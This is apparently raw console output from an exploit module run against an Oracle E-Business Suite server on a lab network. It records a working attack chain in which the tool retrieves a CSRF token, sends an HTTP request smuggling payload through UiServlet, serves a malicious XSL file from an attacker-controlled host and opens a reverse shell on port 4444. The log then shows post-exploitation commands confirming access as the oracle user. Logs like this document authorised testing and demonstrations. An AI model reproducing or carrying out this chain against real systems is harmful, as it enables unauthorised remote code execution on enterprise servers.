[*] Using URL: http://192.168.56.1:1337/
[*] XSL payload will be served at: http://192.168.56.1:1337/HexdwvgO.xsl
[*] Retrieving CSRF token from target...
[+] CSRF token retrieved: 86AJ-2RR3-XDNC-U9I4-Y...
[*] Creating HTTP request smuggling payload...
[*] Triggering exploitation via UiServlet...
[+] Received request: GET /OA_HTML/ieshostedsurvey.xsl from 192.168.56.104:63162
[+] Serving  XSL payload to 192.168.56.104...
[+] XSL payload delivered successfully to 192.168.56.104 (1460 bytes)
[*] Keeping HTTP server alive, waiting for callback to 192.168.56.1:4444...
[*] (Press Ctrl-C to stop)
[*] Waiting up to 30 seconds for reverse shell connection...
[+] Session created successfully!
[*] Server stopped.
[*] Command shell session 7 opened (192.168.56.1:4444 -> 192.168.56.104:61062) at 2025-12-05 09:14:42 +0100
sessions 7
[*] Starting interaction with 7...

id
uid=54321(oracle) gid=54321(oinstall) groups=54321(oinstall),54322(dba) context=system_u:system_r:initrc_t:s0
uname -a
Linux apps 5.4.17-2136.338.4.2.el7uek.x86_64 #3 SMP Mon Dec 23 14:42:43 PST 2024 x86_64 x86_64 x86_64 GNU/Linux
pwd
/u01/install/APPS/fs1/FMW_Home/user_projects/domains/EBS_domain

```